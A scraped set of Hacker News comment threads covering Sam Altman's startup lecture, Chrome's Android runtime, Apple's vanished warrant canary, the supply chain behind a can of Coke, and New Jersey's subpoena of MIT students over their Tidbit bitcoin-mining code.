How does this compare with an MVP approach where you put something out there first and test the market. Then there is the issue of runway. With enough time, you can start with an MVP and iterate in private beta until users love it, but in many cases a founder is not going to have that kind of runway. They have just enough resources to put something together, and they're going to have to go out to the market with that and iterate on the fly. Unfortunately, once you do get out there and need to take on all of the other responsibilities, then that's time taken away from building a great product.

19
lukasm 1 day ago 2 replies      
I find it artificial when the lecturer reads the presentation - it's not a joy to listen.
20
howradical 13 hours ago 0 replies      
Here are some timestamped notes synced with the video: https://timelined.com/how-to-start-a-startup/lecture-1-how-t...
21
dkaplan 1 day ago 0 replies      
Why did we submit questions if the video was just going to cut out at the Q&A
22
petersouth 1 day ago 1 reply      
Sam Altman's law of conservation of how much happiness you can put into the world with the first product from a startup -> the total amount of love is the same it's just a question of how it's distributed.
23
steakejjs 1 day ago 0 replies      
This seems like a really valuable recruiting tool for YC. Start early at Stanford, groom freshman to have a great mindset and understanding of the fundamentals, fund them and make money.

YC is still a for-profit company, after all.

24
lawsohard 14 hours ago 0 replies      
looks like rap genius is putting up a full transcript http://tech.genius.com/Sam-altman-how-to-start-a-startup-lec...
25
steve_taylor 16 hours ago 0 replies      
It's refreshing to see such importance placed on the idea and building a product that users love.
26
hayksaakian 1 day ago 2 replies      
Sam kept bringing up the 10 year number

But: YC (and therefore every YC company) is < 8 years old

What startups succeeded after this long (AND were still actually considered startups)

27
simonebrunozzi 1 day ago 0 replies      
I also don't agree that working on a startup should mean no work-life balance. There's a limit to how productive you can be, and working 90 hours/week is not going to make you more productive than working 45 hours/week. If you work too much, you'll do more mistakes.Ryan Carson, founder of TeamTreeHouse, can teach us a lot about it. http://ryancarson.com/
28
dkural 1 day ago 1 reply      
I disagree that a startup should commonly start with an "idea". Start with an unmet need people are willing to pay for. Or take an existing category with a lot of bad products and make a truly better one that improves every aspect of the experience. Often, you'll see many startups working on the same "idea". Something like Google is truly rare (a genuinely innovative approach to search).
29
bobbles 1 day ago 0 replies      
Are transcriptions of these videos going to be provided?

It's much easier for me to consume lectures as text rather than watching the video.

30
ThomPete 1 day ago 6 replies      
Don't get me wrong I love Sam Altman I love y-combinator but a small part of me is thinking that a good first step to start a startup is to not watch that video and find your own way. Not because it's probably not great but because a startup is not a formula.

Your path is your own.

31
gadders 15 hours ago 0 replies      
Just a quick question - are these a Sam only initiative, rather than YC? Is that why they are on Sam's domain?
32
AzmD 18 hours ago 0 replies      
Ideas are important ... but if Ycombinator stresses so much on the idea being really great then they should take these lines off their website (its on the "Apply" page)

"Your idea is important too, but mainly as evidence that you can have good ideas. Most successful startups change their idea substantially."

33
smaili 1 day ago 0 replies      
Can non-Stanford students drop in or is this for students only?
34
gorkemyurt 1 day ago 1 reply      
its really sad that he is reading the presentation..
35
xavierkelly 21 hours ago 0 replies      
This is a really good video lesson. I fell inspired to work harder on my dreams of growing my startup.
36
7Figures2Commas 1 day ago 0 replies      
"All the advice in this class is geared towards people starting a business where the goal is hyper-growth and eventually building a very large company. Much of it doesn't apply in other cases and I want to warn people up front that if you try to do these things in a lot of big companies or non-startups it won't work."
37
polskibus 22 hours ago 1 reply      
Is there a download link for the video to make offline viewing possible?
38
graycat 1 day ago 2 replies      
Just watched the lecture.

The first part of the lecture was on the "Idea", andI want to give an alternative approach.

First, do I believe that what Altman describes canwork and is what he has seen has worked? Definitelyyes.

Second, is that all that can work? I don't thinkso.

Third, do I suggest that the alternative approach Idescribe here will be common and/or always betterthan what Altman describes? No. Sometimes better?I do believe so. But even if the alternativeapproach is rare, that should not be a huge obstaclesince the success Altman is talking about, the goal,is also rare. That is, for the rare successes, weshould expect that some of the means will also berare and not common.

But for the alternative approach, given that it israre, we should have some solid evidence of itseffectiveness, and I believe that we can.

I want to propose that it can be possible to have anidea, test it, essentially just on paper, and, if itpasses the test, be quite sure the resulting productwill be good and fairly sure the resulting companywill be successful.

Yes, I'm proposing that the alternative approachprovides a way to have the idea be by far the mostimportant part of the work and the rest, e.g., theexecution, be routine.

Or I would say that a good idea is one that makesit through the filters of my alternative approach.Then I am claiming that with a bad idea, yes,execution is everything but with a good ideaexecution is routine.

Yes, to me, the ideas like Altman describes lookto me as far too unpromising to be taken seriouslyand promise that, yes, indeed, execution will bemany times more difficult than the idea. Indeed,Altman is admitting that many start ups fail, thatbuilding a successful start up is difficult. Iwould agree that, starting with a bad idea, buildinga successful start up is difficult.

Now, for the alternative approach for finding a goodidea for a start up:

First, the alternative approach is very selective,that is, rejects a lot of ideas. Some of the ideasthe approach rejects will be able to be the basis ofsuccessful companies. The alternative approachrejects ideas when it just cannot build a rock solidcase that the idea is good. E.g., the alternativedoes not know how to conclude that the ideas forFacebook or Twitter would lead to success. Thealternative wants to accept only good ideas and indoing so will reject a lot of good ideas. Thealternative approach asks for a lot from an idea,and many good ideas will not have that much.

Second, Altman does emphasize that a need and acorresponding solution one person sees in their ownlife can be relevant. Okay, I've been there anddone that, that is, I've seen needs and solutions.

Third, what I'm proposing for an alternative is, atleast in broad terms, and compared with what Altmandescribes, much older, much more thoroughly tested,and with a much better, really excellent, trackrecord.

Actually, we all know at least something, maybe alot, about the alternative and its track record. Ilearned about the alternative early in my careerdoing mostly US DoD projects around DC and also someother experiences, but there is much moreinformation about the alternative readily availablefar from me.

So:

(1) Need.

To make the alternative work, we have to start witha suitable need, i.e., market need, that is, asuitable problem to solve. We want the first goodor a much better solution to be, obviously, nodoubt, a "must have" and not just a "nice to have".

Next, for this need, we want to find the first goodor a much better solution, presented just on paper.

Then we want to evaluate the solution, also just onpaper. Sorry, no, we don't "get out of thebuilding" and talk to other people.

Big example of such a need? Okay, we'd like to havea safe, effective, inexpensive one pill taken onceto cure any cancer. So, yes, early on, forFacebook, Twitter, Snapchat, a lot of doubt. Forsuch a cancer pill, we have "no doubt"; to know thiswe don't have to "get out of the building", askpeople, throw trial solutions against a wall to seeif there is interest, etc.

(2) Solution.

Given the need from (1), we try to find a solution.If we fail here, and likely we will, we return to(1) and find another need. E.g., clearly so far theone pill cure for any cancer will fail here for atleast a long time.

We want a solution that we are sure, "no doubt",will be the first good or much better.

Here's a way: Start with the real problem and seewhat about it we can assume. Then convert thisproblem and its assumptions into a mathematicalproblem. So, we are limiting ourselves to needsthat lead faithfully to mathematical problems.Sorry, no intuitive heuristics need apply.

Next find a mathematical solution.

Develop the mathematical solution just on paper, ascarefully done theorems and proofs, and thenseverely check the proofs.

Then observe that it is totally clear that themathematical solution will be fully close enough tothe first good or much better solution we want forthe need.

If any of the work here in step (2) fails, thenreturn to step (1)

(3) Product.

Write software to do the data manipulationsspecified by the mathematical solution. Severelycheck the software. That's essentially the product.

If fail here, then return to (1).

Track record? Okay:

(A) GPS.

(B) The version of GPS done first by the US Navy forthe SSBNs.

(C) Beam forming in passive sonar.

(D) The A-bomb of WWII -- all three exploded just asplanned.

(E) The H-bomb of the 1950s -- first test, 15million tons of TNT.

(F) The SR-71, for Mach 3+, 80,000+ feet, 2000+miles without refueling; proposed by Kelly Johnsonjust on paper; built and flown just as proposed.

(G) Keyhole satellite, essential a Hubble, beforeHubble, but aimed at earth instead of space.

(H) The F-117 stealth, essentially a modified F-16,flew as planned, through Saddam's anti-aircraftartillery without a scratch.

(I) The airplane the Wright brothers took to KittyHawk, NC.

(J) Phased array radar for Aegis class ships.

(K) High bypass turbofan engines.

(L) RSA encryption.

(M) Hubble.

(N) LHC.

(O) COBE, WMAP, and Planck.

And there are many more. Such projects that failedin execution? Tough to find. Batting average?Near 1000.

Right: Projects A-O are all just technicalprojects. Right. But in each case they providedthe intended solution for the need. As we haveexplained, to have a successful technical solutionlead to a successful solution in business, we wantsuch a solution to be a "must have"; else we returnto (1).

The high bypass turbofan jet engine a commercial"must have"? Darned right: It saves an ocean ofexpensive jet fuel. How? Simple: Burning jet fuelreleases energy. Want to convert that energy tokinetic energy and get the resulting momentum. Butfor mass m and velocity v, kinetic energy is (1/2)mv^2 and momentum is just mv. So, we pay in energy(1/2) mv^2 and get in the momentum we want mv.

So, since in kinetic energy we have v^2 but inmomentum have just v, to get more of our desiredmomentum from our given, available energy, we want mto be large and v to be small. So, mostly we wantto use the hot gasses from the combustion to turn abig ducted propeller that moves a huge mass of airat a low velocity. Instead, the military jetengines intended for supersonic speeds, and longused in commercial aviation because they wereavailable, move a smaller mass at high velocity.So, for commercial, subsonic flight, a high bypassturbofan is a "must have". Then have the first goodone or a much better one, as we have assumed, andvery much should have a successful business.

39
reelgirl 1 day ago 0 replies      
I loved the video and it really encouraged me to keep on trying.
40
simonebrunozzi 1 day ago 0 replies      
Sam, your voice sounds very irritating to me. Sometimes too fast, no "tempo". I think you should change the way you deliver your points to a classroom. (constructive feedback, not rant
41
hanley 1 day ago 0 replies      
Very interesting lectures and it's great that they are doing this. Both of the speakers could benefit from a public speaking class though.
42
gbachik 1 day ago 0 replies      
It was so good I wish It was thursday.

I want mooooore!

43
pmosh 1 day ago 0 replies      
subtitles please!!
44
porter 1 day ago 1 reply      
Ycombinator leading the way once again. Looking forward to this!
7
Chromeos-apk Run Android APKs on Chrome OS, OS X, Linux and Windows
466 points by ProfDreamer  5 days ago   92 comments top 19
1
cryptoz 5 days ago 3 replies      
This is amazing. There's a long reddit thread and some additional instructions here: http://www.reddit.com/r/Android/comments/2gv035/you_can_now_...

From the README:

> Soundcloud - Works, crashes when playing sound

Funny definition of 'works'.

2
byuu 5 days ago 5 replies      
Can anyone explain how this differs from using an Android emulator? (http://developer.android.com/tools/help/emulator.html)

Is it a matter of features, speed, or convenience? Obviously, all of those can be overcome, be it as a fork of the official emulator or as a third-party emulator. For instance, this new Chrome extension must be the same thing under the hood: a Dalvik runtime, possibly an ARM->Intel recompiler for any NDK applications, etc.

I figured the only reason this wasn't done to mass effect already was because it wasn't in demand. But if it's so desirable, surely creating an actual emulator would be superior to hacking up web browser extensions and ostensibly playing cat-and-mouse with Google over this?

3
AdmiralAsshat 5 days ago 3 replies      
Neat proof of concept.

I hope Google gets us something official sooner rather than later. It's a little disheartening that I own a Chromebook Pixel and yet I can't use Google's own hardware to design or test Android apps without installing Eclipse on a sideloaded Linux chroot via Crouton.

4
kasabali 5 days ago 2 replies      
I will absolutely go nuts if this thing manages to run OneNote on my Debian desktop.
5
wzsddtc 3 days ago 0 replies      
We worked with the ARC team at Vine as a launch partner, there were 0 modifications that we had to do to get it working on ARC. The only difference was that the "bugs" we had to fix were all reproducible on Nexus devices as well BUT the threading model had to be more strict on ARC in terms accessing system resources.
6
oldgun 5 days ago 0 replies      
This is amazing.

I hope Google could really carry this project as far as possible. The next several major issues would be polishing up the platform, eliminating the bugs, unifying the android and chromebook development interface. Think of one day when android developers could actually design apps for the desktop. How cool would that be?

That's when Microsoft should really get worried.

7
niutech 4 days ago 1 reply      
Running Android apps in Chrome on desktop is huge! I'm glad that the ARC runtime I provided in https://github.com/vladikoff/chromeos-apk/issues/5 helped to achieve this.
8
Flenser 13 hours ago 0 replies      
could you use this to run ChromiumTestShell.apk on windows for testing android chrome rendering?

[1] http://commondatastorage.googleapis.com/chromium-browser-con...

9
bla2 5 days ago 0 replies      
Interesting, Google announced working on this on this year's I/O and posted the first apps just one week ago ( http://chrome.blogspot.com/2014/09/first-set-of-android-apps... ).
10
tracker1 5 days ago 1 reply      
Hope this means good netflix support in Linux.
11
bmelton 5 days ago 1 reply      
So, now we can write apps in Angular that run on the web and compile to Java so that we can install them to Android, running on ChromeOS, running on OSX.

Brilliant.

Edit: Perhaps the punny nature of this is deserving of downvotes, but the statement above is the actual use case I presented to a co-developer, discussing how this project could be of use to our app, which was built with Ionic.

FWIW, there's value in it (the app, not necessarily this post) even if it means having to unplug fewer devices to swap them out with different devices to test.

12
asadotzler 5 days ago 0 replies      
Java makes a triumphant comeback in the browser?
13
kyrrewk 4 days ago 0 replies      
I have had some success running Android x86 (http://www.android-x86.org/) in VirtualBox.
14
bussiere 5 days ago 0 replies      
Fuuuuu Out There a good game only available on mobile crash with this solution ...

Dam but it looks full of promise i hope one day it will work well ...

15
mattfrommars 4 days ago 1 reply      
How is this really good? Android apps are really good but they are designed for touch interface on mobile devices, not desktop.
16
em3rgent0rdr 5 days ago 0 replies      
Awesome! Works for me on arch linux running latest chromium. Much faster than running android emulator!
17
chj 5 days ago 0 replies      
Google needs to do this.
18
mjcohen 3 days ago 0 replies      
Want Open Office!
19
stuaxo 5 days ago 0 replies      
Its about bloody time!
8
Apples warrant canary disappears
405 points by panarky  6 days ago   93 comments top 15
1
kwhite 6 days ago 4 replies      
Is there any reason why a company could not apply the same concept of a warrant canary on a user-by-user basis?

Imagine seeing a message every time you log into your Gmail account informing you that Google has never been compelled to surrender your private data to a law enforcement agency.

2
panarky 6 days ago 1 reply      
Possible explanations:

1) It wasn't a canary to begin with, so its removal means nothing.

2) There's no legal precedent for disclosing a Section 215 order by killing the canary, so Apple removed it before they received a Section 215 order. That way it doesn't disclose anything and Apple avoids legal liability.

3) Apple really did receive a Section 215 order.

3
rrggrr 6 days ago 0 replies      
As explained by Apple:

In the first six months of 2014, we received 250 or fewer of these requests. Though we would like to be more specific, by law this is the most precise information we are currently allowed to disclose.

http://www.apple.com/privacy/government-information-requests...

4
nl 6 days ago 1 reply      
Interesting and somewhat disappointing that it took a year for anyone to notice that it had disappeared. The appearance generated quite a lot of interest.

(Of course, I'm as responsible as anyone else for not noticing. I wonder if it would be possible to build a service to proactively check for their disappearance?)

5
UVB-76 6 days ago 2 replies      
Gee, thanks for the hat tip...

https://news.ycombinator.com/item?id=8334058

6
johnhess 6 days ago 4 replies      
Could a lawyer or someone with familiarity with warrants like these explain how a "warrant canary" is legal?

I understand the concept, but discloses something you can't disclose. They can compel you to lie/not comment if asked, "Hey, Apple, did you get any of those National Security Letters".

Is there a clear cut loophole or is this something yet to be challenged?

7
tkinom 6 days ago 1 reply      
I wonder what happen if Russian, China, India, Japan, EU all demanding same level of access to Apple's data.

Apple might not care about Iran or other smaller countries, but how is it going to deal with big market like China, India, EU?

8
chiph 6 days ago 0 replies      
Under what conditions would the warrant canary statement reappear? I'm thinking of those workplace safety signs: "This corporation has operated for [ 179 ] days without a Section 215 warrant being served"
9
crazypyro 6 days ago 0 replies      
Have any of the other major tech companies had similar canary disappearances? I only ask because this is the first time I've heard of one actually being used by a tech company as a warning flare.

I'd expect a governmental legal challenge...

10
MrJagil 6 days ago 11 replies      
I've asked this before to no avail, but what can the NSA possibly do if Apple refuses?

Fine them? Sure, they have billions.

They can't arrest the company... Is Cook going to jail? What is the actual threat here? You could argue that Apple has more power than many governments.

11
staunch 6 days ago 1 reply      
Apple should just declare that they have been subject to Section 215. Given how many users Apple has it can't reasonably be argued that such a disclosure would be a danger to national security.

Hopefully they would end up before SCOTUS and help defang the USA PATRIOT Act.

12
stevewepay 6 days ago 0 replies      
So now what? Now that the canary has disappeared, is there no other information that can be transmitted to us? It feels like it's a binary signal that just got set permanently, so there's no more information we can glean from it.
13
ForHackernews 6 days ago 1 reply      
Very interesting in light of this: https://news.ycombinator.com/item?id=8333258
14
maresca 6 days ago 0 replies      
Perhaps this is the reason for all of the security updates in iOS 8.
9
What Coke Contains (2013)
406 points by fmela  5 days ago   176 comments top 33
1
d0mdo0ss 5 days ago 4 replies      
> coca-leaf which comes from South America and is processed in a unique US government authorized factory in New Jersey to remove its addictive stimulant cocaine

According to Wikipedia "The Stepan Company is the only manufacturing plant authorized by the Federal Government to import and process the coca plant, which it obtains mainly from Peru and, to a lesser extent, Bolivia. Besides producing the coca flavoring agent for Coca-Cola, the Stepan Company extracts cocaine from the coca leaves, which it sells to Mallinckrodt, a St. Louis, Missouri, pharmaceutical manufacturer that is the only company in the United States licensed to purify cocaine for medicinal use."

2
Someone1234 5 days ago 11 replies      
I wish Coca Cola would make a acid free version of coke. The Phosphoric Acid adds a slight tang to the drink, but in exchange absolutely destroys your teeth over years of consumption.

For regular drinkers like myself I'd happily pay a small premium to buy the "acid free" version of the drink. The sugar still does damage but with both the acid AND sugar it is like a double whammy of "badness" (acid which destroys your teeth's natural protective coating, and sugar to feed the bacteria which actually eat away at your teeth).

No amount of brushing can really undo the amount of damage acidic soda does to your teeth, trust me I know! Even with prescription toothpaste with fluoride 5x times stronger than normal (5000 ppm toothpaste Vs. 1100 ppm) you're only slowing down the progression.

3
jstalin 5 days ago 4 replies      
The same type of story as the classic "I, pencil," published in 1958:

https://en.wikipedia.org/wiki/I%2C_Pencil

4
srean 5 days ago 1 reply      
The article waxes so eloquently about this beloved product that I would have mistaken it for a paid PR piece. The article is great read nonetheless.

For those who are also interested in the other darker, grimier side of the same coin, might want to check out its use of mercenaries for union busting in South America(by murder of course. In the hands of the right spinners that would be 'terrorism'), similar stuff happened in India as well.

http://en.wikipedia.org/wiki/Criticism_of_Coca-Cola#Bottling...

http://en.wikipedia.org/wiki/Criticism_of_Coca-Cola#Environm...

5
klinquist 5 days ago 3 replies      
You can make your own almost-Coke... OpenCola, the open-source cola.

https://en.wikipedia.org/wiki/OpenCola_(drink)

6
gokhan 5 days ago 9 replies      
> The number of individuals who know how to make a can of Coke is zero.

This reminds me a fact I remember time to time. If civilization collapses after, say, a world war, I most probably can't make a pot, can't grow plants, can't differentiate if one is edible or not, can't dig for petrol, can't make plastic (or even glass), can't reinvent concrete, can't make gunpowder etc., you get the point.

I can only write software and maybe drill with tools and nail with a hammer but that's all.

7
bjornsing 5 days ago 3 replies      
> The top of the can is then added. This is carefully engineered: it is made from aluminum, but it has to be thicker and stronger to withstand the pressure of the carbon dioxide gas, and so it uses an alloy with more magnesium than the rest of the can.

Nope, the pressure from the carbon dioxide pushes equally against all sides of the can. If anything the pressure at the top is slightly lower than at the bottom, at least if the can is standing, because of the weight of the coke pushing against the bottom.

8
vesche 4 days ago 0 replies      
> ... the inside of the can is painted toowith a complex chemical called a comestible polymeric coating that prevents any of the aluminum getting into the soda.

I though this was very interesting, so I did a little digging... There is remarkably little information on these 'comestible polymeric coatings', but I was able to find (see below) a reason as to why that is. Apparently these coatings are propriety to the manufacturer and there are competing companies who are constantly in a race to find the best coating.

It's supremely interesting the fact that drinking a can of coke is almost a magic trick right in front of your eyes. It'd be like someone holding a lighter straight to a piece of paper and everyone being baffled as to why it isn't lighting on fire. Yet when someone drinks a coke no one bats an eye as to how it isn't mixing with the metal salts and eating straight through the aluminum can.

"Interior can coatings designed to prevent migration of metal salts into the contained product are called "comestible polymeric coatings". The coatings ars polymers typically used in coil coating. The exact nature of the coatings isn't available since most are proprietary to manufacturers who continuously look for better coatings."

source: http://www.eng-tips.com/viewthread.cfm?qid=258261

9
JacobAldridge 5 days ago 1 reply      
Actually, the Pinjarra process creates Aluminium. The process of shipping it to Long Beach CA converts it into aluminum.
10
neya 5 days ago 2 replies      
I'm surprised that the author hasn't mentioned the use of toxins (pesticides)[1], to the extent that it is even being used as a real pesticide in various parts of India.

I know some may find this offensive, but sorry, I think I have a moral responsibility myself to let the people around me know of the harms caused by this carcinogen[1].

Cheers.

[1]http://en.wikipedia.org/wiki/Criticism_of_Coca-Cola#Pesticid...

12
makmanalp 5 days ago 0 replies      
My favourite version of this is a picture of a boeing 787 and where all the parts are manufactured: http://seattletimes.com/art/news/business/boeing/787/partsen...

Of course if you could break it down further into smaller parts and tools to manufacture those parts, you'd get an even greater variety of countries and companies.

The center where I work actually does work slightly related to this, https://www.youtube.com/watch?v=0JC24CBVsdo

13
Theodores 5 days ago 1 reply      
You could say this about any product. I think the essay would be considerably longer if it concerned a typical PC or phone, not to mention a car.

I also think the essay can be written with cynicism instead of wonder, e.g. with an anti-capitalist slant. With one innocuous affordable purchase you can deforest and pollute four continents whilst giving yourself diabetes and dental caries!!!

14
gburt 5 days ago 0 replies      
I am reminded of I, Pencil. [1]

[1] http://www.econlib.org/library/Essays/rdPncl1.html

15
jeffbarr 5 days ago 2 replies      
This is my favorite sentence of the article:

> Modern tool chains are so long and complex that they bind us into one people and one planet.

When we think about colonizing the Moon or Mars with small groups of people with the intention of making the colonies self-sustaining over time, deep, long-evolved tool chains like the one described in the article could be very difficult to scale down and to replicate in other environments.

16
raverbashing 5 days ago 1 reply      
"The top of the can is then added. This is carefully engineered: it is made from aluminum, but it has to be thicker and stronger to withstand the pressure of the carbon dioxide gas, and so it uses an alloy with more magnesium than the rest of the can"

Yes, but the pressure is the same on all parts of the can. Ok, almost the same, still.

Maybe because of the parts that have been cut to make it easy to open?

17
Tloewald 3 days ago 0 replies      
This article reminds me strongly of a pivotal passage in the novel Gain, by Richard Powers (which I can't recommend highly enough, although it's a downer). In that passage he describes how a disposable film camera is made.
18
AlyssaRowan 4 days ago 0 replies      
Not that I want to waste any time on a HPLC-MS machine on this, but I was distinctly under the impression Coca-Cola 7X does not actually contain kola nut?

I've had Red Bull Cola, and actually found it quite different, but delicious. No accounting for taste, though.

19
NotOscarWilde 5 days ago 2 replies      
Speaking as somebody who's never even smoked a cigarette or a joint: are there people who tried to recreate the "original" coke recipe? The one with "unprocessed" coca leaves? Is it available on say the latest instance of Silk Road? What is it like?
20
lpolovets 5 days ago 0 replies      
There's a book with a similar theme about Twinkies. It's called "Twinkie, Deconstructed" (http://www.amazon.com/gp/product/B000OZ0NZS)
21
exacube 4 days ago 2 replies      
How can 0 people know what's in Coke while still getitng it FDA approved? Surely this can't be true.. How does the company know how to make a can of coke if they don't know how it's put together?
22
TazeTSchnitzel 5 days ago 1 reply      
> The number of individual nations that could produce a can of Coke is zero.

While this is true in that no individual nation could produce Coke with the exact same formula, an individual nation could surely produce a soft drink.

23
Istof 5 days ago 1 reply      
"[...] and the edges of the can are folded over it and welded shut."

I never thought there was any weld in a soda can... (and I still don't think there is any)

24
cbhl 5 days ago 1 reply      
Article title should probably contain (2013).
25
justintocci 5 days ago 1 reply      
i wonder what the failure rate on the interior coating is? How often are people ingesting disolved aluminum?
26
swartkrans 5 days ago 1 reply      
Is the ammonia dangerous? Or can it be? How much ammonia can a person consume before it becomes dangerous?
27
alecco 5 days ago 1 reply      
To keep you drinking they add plenty of sodium (50mg+) masked with sugar, HFCS, or sweeteners. They also add caffeine as a diuretic to keep consumers drinking, too. And then they market it to children, lovely people.

Check out Dr. Robert Lustig videos. Also, the book Salt, Sugar, Fat, about food industry engineering.

28
yarou 5 days ago 0 replies      
He forgot to mention the Colombian paramilitaries that break up Coke bottling plant unions by kidnapping their children. Funny how "globalization" is presented in a saran-wrapped, sanitized version.
29
InclinedPlane 4 days ago 0 replies      
This is good, although I think it reaches just a little too far when it says that the number of nations that could produce a can of coke is zero. If the US so desired it could grow coca leaves, and kola nuts, and use locally produced aluminum, etc.
30
Smachine 5 days ago 0 replies      
Think of all of the jobs the making of Coke provides. Oh here we go......lol
31
argumentum 5 days ago 0 replies      
A brilliant paean to the free market and the invisible hand. Milton Friedman once described the manufacture of a humble pencil in this way.

(edit: just saw a link to an essay entitled "I, Pencil" at the bottom .. this might have pre-dated Friedman).

32
WiggleYourIndex 4 days ago 0 replies      
Clean water tastes better.
33
joshfraser 5 days ago 1 reply      
1 can of coke contains 160% of your recommended daily intake of sugar. But you won't see that on the label because money.
10
MIT Students Battle State's Demand for Their Bitcoin Miner's Source Code
412 points by msantos  2 days ago   123 comments top 25
1
will_brown 2 days ago 4 replies      
There is a lot of confusion in this thread regarding basic concepts of the law.

1. The NJAG is not prosecuting the MIT student(s) (at least not yet). Therefore, this is not similar to the alleged overzealous prosecutors in the Swartz case.

2. A subpoena is a writ compelling testimony or evidence. A subpoena is not synonymous with being a defendant.

3. NJAG served one MIT student with a subpoena to turn over documentation (source code, downloads, users, ect...)for a program which maybe being used by third party websites in a way that violates the rights of NJ residents vis-a-vis unauthorized access to computer systems.

4. It seems there is an issue raised arguing NJAG does not have jurisdiction over the MIT student(s). Personally I would find this analysis the most compelling because it is at the intersection of where facts and law meet.

5. EFF is arguing that complying with the subpoena may violate the students right against self-incrimination. I think this is a losing argument where one's right against self-incrimination is rather limited, generally to information contained within their mind and not typically extended to documentation and records.

6. Though this is not at issue, it would be almost impossible for the MIT student(s) to have committed a crime, as the crime would require intent. It would be nearly impossible to prove the student(s) intended that their code be downloaded by third-party websites for the specific purpose of running on the end users computers without their knowledge. It would be on par with charging a gun manufacturer criminally for intending that their guns be manufactured and sold for the exclusive purpose of committing crimes.

2
bertil 2 days ago 3 replies      
That article describes a though experiment that would A. remove an ad, and B. should (but doesn't) trigger a BitCoin miner. It's clearly marketed as an illustration to an idea. I'm failing to see the consumer fraud. Is this like accusing a car-manufacturer of manslaugher because they latest concept-car didn't have seat-belts?

I would like to know if that's selective reporting from Wired, or spectacular fishing from NJ state atorney.

Also, neither the hackathon, nor MIT appear to be in NJ: what is their jurisdiction? Those two issues should be clarified in any basic coverage of the incident: at this point, it is plain bad reporting.

3
eli 2 days ago 1 reply      
The EFF has the actual documents in the case posted https://www.eff.org/cases/rubin-v-new-jersey-tidbit

Based on a quick skim, this is the closest NJ comes to making a case: https://www.eff.org/document/nj-attorney-general-response-ef...

4
teachingaway 2 days ago 1 reply      
New Jersey's Position is laid out in their 3/7/2014 filing. https://www.eff.org/files/2014/03/07/njs_memo_in_opposition_...

Here's the relevant parts (lightly edited):

The Division issued the Subpoena and Interrogatories in furtherance of its investigation into an entity called Tidbit. Tidbit is a group of students who developed a software code that may have hijacked the computer resources of consumers within the State of New Jersey and improperly accessed and/or used such computer resources to mine for bitcoins for the benefit of Tidbit and its customers and without any notice to, or obtaining consent from, New Jersey consumers, in possible violation of the New Jersey Consumer Fraud Act ("CFA") and Computer Related Offenses Act ("CROA"). Bitcoins are a digital medium of exchange that can be traded on online exchanges for a dollar value. Bitcoins are "mined" through the use of computer resources to solve complex algorithms. Many times, consumers' computer resources are unknowingly accessed by entities through software code or otherwise in order to mine for Bitcoins.

Plaintiff's own description of its services strongly suggests that the code it developed is, in fact, designed to hijack consumer's computers. .... Further, contrary to Plaintiffs allegations in its brief, the Division specifically found Plaintiff's code on the websites of entities located in New Jersey. Furthermore, the Division determined that the code was active.

The following representations, among other things, are made on the Tidbit Website: "Monetize without ads"; "Let your visitors help you mine for Bitcoins;" and "Built on the bleeding edge." The Tidbit Website further provides: "How does it work? ... [1] Make an account - Sign up with your Bitcoin wallet ... [2] Paste the code - we'll give you a snippet to put in your website ... [3] Cash Out! - We'll send a transaction to your Bitcoin wallet." ...

E. The Division's Undercover Investigation

On February 7,2014, the Division re-accessed the Tidbit Website and "Sign up" button. While on the Tidbit 'Website, the Division submitted Sign-up Information to Tidbit using an undercover e-mail address and an undercover bitcoin wallet id. In response to receiving the Division's undercover Sign-up information, Tidbit sent the Tidbit Code to the Division's investigator via a confirmation page on the Tidbit website ("Confirmation Page"). The Tidbit Code that the Division received includes the Division's undercover bitcoin wallet id. Additionally, among other things, the Confirmation Page states: "Your embed code - Paste this at the bottom of your HTML page, and your visitors will start mining Bitcoins for you!" (emphasis in original).)

5
downandout 2 days ago 0 replies      
There is an option in all browsers to disable javascript. That, combined with the fact that you are requesting files from a website (as opposed to them being surreptitiously forced onto your machine) implies consent to execute the code sent to you. Finally, the code made no attempt to go beyond user-granted access limits (in this case the ability to run javascript in the browser, a decision which is entirely under the control of the user).

I cannot see how a fraud or hacking case of any kind could be made here, even if they got the code.

6
JacobEdelman 2 days ago 3 replies      
I feel like this article is a bit one sided. It doesn't ever state NJ's case against the students and draws strong parallels to Aaron Swartz (a hero to many people). A lot of the time these parallels seem to be weak, the student who did this is an MIT student who built a piece of software at a hackathon, this has almost nothing to do with Aaron Swartz's situation except it involves a young programmer and MIT.
7
borlak 2 days ago 0 replies      
Tidbit inspired me to write my own web-miner, which I open sourced. It's hacked together as I was really just trying to learn how the cryptocoin&mining stuff worked. The mining rate you get with straight javascript is truly abysmal, even with web workers (much worse than the standard cpuminer).

I found a couple examples that do the scrypt part with GPU in browser, but your browser has to support custom shaders, I think (I forget the details), and the version most browsers support doesn't allow this (again, my memory is sketchy about the details).

Anyway Here you go, NJ! https://github.com/borlak/cryptocoin_scrypt_stratum

8
csense 2 days ago 2 replies      
Don't users implicitly consent to a website using their CPU and bandwidth for arbitrary tasks while the website is open, by using a browser that downloads and runs arbitrary JavaScript and allows it to XMLHTTPRequest?

Even if the code in question was being run on a publicly accessible website, was used by a New Jersey consumer, and was fully functional and actually mined Bitcoins (all of those points are disputed by the students' counsel)...The only thing that's being taken by the website operators would be users' CPU cycles and bandwidth. And if the users have implicitly consented to the website's arbitrary use of those resources, how is anyone being harmed?

9
tgb 2 days ago 5 replies      
What law did they supposedly break?
10
lotsofmangos 2 days ago 2 replies      
They want source code for a client side javascript miner that they saw on a website. Was their right mouse button broken?
11
joshdance 2 days ago 2 replies      
This seems insane to me. What law was broken? What could even be considered remotely criminal about this? Seems like a gross over reach by the gov.
12
peter303 2 days ago 1 reply      
I'd curious to find out why NJ AG would get so paranoid about this? I couldnt really find a link to their side of the story.

The Natinal Science Foundation did discipline a researcher who did some mining on their computers.

13
Cogito 2 days ago 0 replies      
Perhaps most interesting in my reading of the documents provided by the EFF is the correspondence regarding the counter-sue made by Rubin against the NJAG.

In it NJAG lay out exactly what they think Rubin did:

...Plaintiffs development, use and deployment of the Tidbit Code which, by plaintiffs own description, strongly suggests the code was designed to hijack consumer's computers to mine for bitcoins, including the computers of New Jersey consumers. Further, prior to the issuance of the Subpoena and Interrogatories, the Division determined that the Tidbit Code was present and active on the websites of entities located in New Jersey and Plaintiff affirmatively sent the Tidbit Code to the New Jersey based entities.

They posit that the code was

1. Designed to hijack a consumer's computer for the purpose of mining bitcoins

2. The computers targeted for hacking (implicitly the entire internet) include those of New Jersey consumers

3. The code was found on websites owned by New Jersey entities

4. Rubin sent the code "affirmatively" to those New Jersey entities

